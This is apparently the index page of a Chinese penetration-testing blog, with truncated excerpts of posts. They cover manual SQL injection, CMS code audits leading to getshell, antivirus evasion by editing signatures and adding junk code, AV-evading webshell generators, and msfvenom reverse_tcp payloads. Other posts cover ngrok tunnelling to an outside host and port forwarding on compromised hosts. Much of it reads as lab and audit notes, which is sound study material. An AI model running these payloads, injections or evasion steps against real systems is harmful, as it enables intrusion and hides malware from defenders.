爬某博客 import reimport requestsfrom bs4 import BeautifulSoupimport timerequests.packages.urllib3.disable_warnings()headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 \ ...
一次渗透 注入1)网站首页2)简单and 1=1 ,1=2判断注入点3)order by 确定字段数为9,显示位union select 1,2…判断为4和84)判断权限root权限,思考使用into outfile直接写shell或者是外联数据库,使用日志getshell5)into outfile写shell。判断mysql版本为5.5,既必须查看secure-file-priv导...
s-cms后台getshell 重装导致任意代码执行代码分析在install.php中判断data/first.txt中值是否为0在后台存在任意txt文件修改(此处不分析代码,系统自带)将0改为任意值再看install.php142-163行将获取到的数据库信息进行连接,当成功后就进行数据库信息写入。此处仅需绕过数据库写入与conn.php文件引号的逃逸。既只用在数据库名处填写3333;#”);phpinf...
特征码简单修改学习 修改字符串大小写法使用C32打开程序,选中然后name小型变为大写等价替换法(相似指令替换)XOR EAX, EAXXOR EAX, EAXJE 10000418改为:XOR EAX, EAXJz 10000418通用跳转法将特征码换到空区域,在跳转回来跳走跳回...
加花的简单学习 目标getpass1)使用zeroadd进行简单的加区2)使用_LordPE_fix定位加区位置,与文件入口3)使用OD进行简单加花,保存4) 更改入口点5)保存运行6)不科学的过了火绒。。。使用360被报毒...
baiyicms的一次审计 下载安装好后,在admin->controller->file.php文件的edit方法中,使用allowEditor过滤后缀,判断是否可写入跟进函数,发现html,css,js,txt文件可写入下面判断又为false,即可写入html,css,js,txt文件又因为该cms使用了模板引擎加载,既模板的html文件会被渲染为php执行,造成了任意代码执行。漏洞演示:登...
对hsycms的一次审计 非最新版本前台注入在common.php的32行,直接进行sql查询搜索prevNext方法哪里被调用,在show.php的38被调用,可看到传入参数跟进ID,在其第10行跟进input方法使用其方法传参且无过滤,导致ID可控,存在注入。漏洞利用python.exe .\sqlmap.py -u http://q.com/product/132 -D hsycms -T s...
一次简单手工注入 一次简单的手工注入注入点http://xxx/news.php?newsid=18收集了下IP,不能sqlmap了,就只能手工了。1)确定注入点。经典 and 1=1 1=22)简单的order by 确定字段数。一直报错,感觉是被过滤了,后面使用注释符也不行使用union select 1,2,3也报错,确定不了字段数。3)尝试报错注入成功payload:union ...
一次失败的审计 项目地址https://www.douphp.com/DouPHP v1.5 Release 20190711工具:phpstudy+navicat+Seay源代码审计系统+PhpStorm项目目录审计注入首先在product.php的19行,看到使用request接受id与unique_id跟进get_legal_id方法判断ID是否为数字,is_unique_id无法找...
记录一次TP框架开发学习 之前自己看了php基础就去审计,发现很多方法都不知道,审计呢也是审计不出洞,知识还没到位,便去看了TP框架开发,有助于审计的学习。项目地址https://www.php.cn/course/332.html开发工具JetBrains PhpStorm+navicat+phpstudy+tp3.2.3流程简介0X00 tp3.2.3介绍目录index.php 入口文件README...
记一次免杀webshell的工具使用及powershell的编码 原项目地址https://github.com/yzddmr6/webshell-venom简单使用python py.py > test.phpD盾查杀(检验是否免杀的唯一标准)目前仅支持asp.aspx.php。but asp的免杀效果较差。笔者开始使用的是powershell,但是生成的shell并不能使用,后面发现是powershell的编码原因。用ps生成的...
GreatSCT使用 GreatSCT简介GreatSCT目前得到了@ConsciousHacker的支持,该项目名为Great SCT(Great Scott)。Great SCT是一个用于生成应用程序白名单绕过的开源项目。此工具适用于红队和蓝队。它是一种用来生成Metasploit payload的工具,可绕过常见的防病毒解决方案和应用程序白名单解决方案。项目地址:https://github.com/Grea...
某公众号之图片反弹shell(标题党) 某公众号之图片反弹shell具体公众号猜吧,哈哈哈哈原项目地址https://github.com/peewpw/Invoke-PSImage攻击机 kali 192.168.5.102靶机 win10 192.168.0.311)生成一个msf ps1脚本msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.5....
ngrok的使用 ngrok的使用地址http://www.ngrok.cc1)开通隧道2)生成msf payload,使用ngrok的地址与端口生成payloadmsfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx.com LPORT=10842 -f exe> shell.exe3)启动ngrok客户端,msf启动ngrok....
EW使用 EW使用靶机 win7 192.168.5.101攻击机 win 10 192.168.0.31攻击机 kali 192.168.5.1021)ew 自身的各个选项用途说明-l 指定要监听的本地端口-d 指定要反弹到的机器 ip-e 指定要反弹到的机器端口-f 指定要主动连接的机器 ip-g 指定要主动连接的机器端口-t 指定超时时长,默认为 10002)执行正向转发在k...
portfwd使用 一款内置于msf的工具靶机 win7 192.168.5.101攻击机 win 10 192.168.0.31攻击机 kali 192.168.5.102先配置msf,并反弹会话转发,把win7 3389转发到kali的33333端口portfwd add‐l 33333 ‐r 192.168.5.101 ‐p 3389使用win10 远程桌面功能访问kali的52端口,既访...
lcx使用 lcx使用win7 192.168.5.101win 10 192.168.0.31kali 192.168.5.102lcx本机: lcx -listen 2222 33332222为转发端口,3333为本机任意未被占用的端口肉鸡:lcx -slave 2.2.2.2 2222 127.0.0.1 33892.2.2.2 为本机IP,2222为转发端口,127.0.0.1为肉鸡内...